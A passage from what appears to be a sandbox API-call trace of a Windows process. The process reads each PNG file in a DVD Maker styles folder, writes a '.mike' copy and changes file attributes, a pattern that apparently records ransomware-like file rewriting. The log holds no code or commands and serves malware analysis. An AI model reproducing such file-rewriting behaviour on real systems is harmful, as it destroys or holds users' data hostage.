Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png.mike")) returned 1 [0054.640] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.644] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png", dwFileAttributes=0x80) returned 0 [0054.645] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png.mike")) returned 1 [0054.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0054.646] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0054.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0054.647] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0054.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0054.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0054.647] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0054.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.648] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), fInfoLevelId=0x0, lpFileInformation=0x21364e8 | out: lpFileInformation=0x21364e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e55)) returned 1 [0054.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.648] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), fInfoLevelId=0x0, lpFileInformation=0x2136844 | out: lpFileInformation=0x2136844*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e55)) returned 1 [0054.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.648] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.648] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0054.649] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0054.649] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.649] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0054.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0054.650] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), fInfoLevelId=0x0, lpFileInformation=0x21372bc | out: lpFileInformation=0x21372bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e55)) returned 1 [0054.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0054.651] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.651] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0054.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.654] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.654] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0054.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.655] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.655] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0054.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.655] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.655] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0054.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.656] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0054.656] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0054.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0054.657] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.657] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.657] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9dec9e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9dec9e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9dec9e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3080)) returned 1 [0054.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.657] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.657] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.657] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x214f8a8 | out: lpFileInformation=0x214f8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9dec9e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9dec9e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9dec9e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3080)) returned 1 [0054.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.657] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.657] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", dwFileAttributes=0x80) returned 0 [0054.658] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.658] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0054.658] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9dec9e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe9dec9e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe9dec9e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3080)) returned 1 [0054.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0054.658] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpFilePart=0x0) returned 0x4d [0054.658] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike", lpFilePart=0x0) returned 0x52 [0054.659] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.mike")) returned 1 [0054.660] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", lpFilePart=0x0) returned 0x53 [0054.661] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", lpFilePart=0x0) returned 0x53 [0054.661] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", lpFilePart=0x0) returned 0x53 [0054.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0054.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0054.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0054.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0054.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0054.662] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0054.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.663] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", lpFilePart=0x0) returned 0x53 [0054.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0054.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0054.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0054.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0054.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0054.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0054.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.667] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0054.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0054.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0054.668] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png.mike")) returned 1 [0054.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0054.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0054.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0054.670] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.670] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD 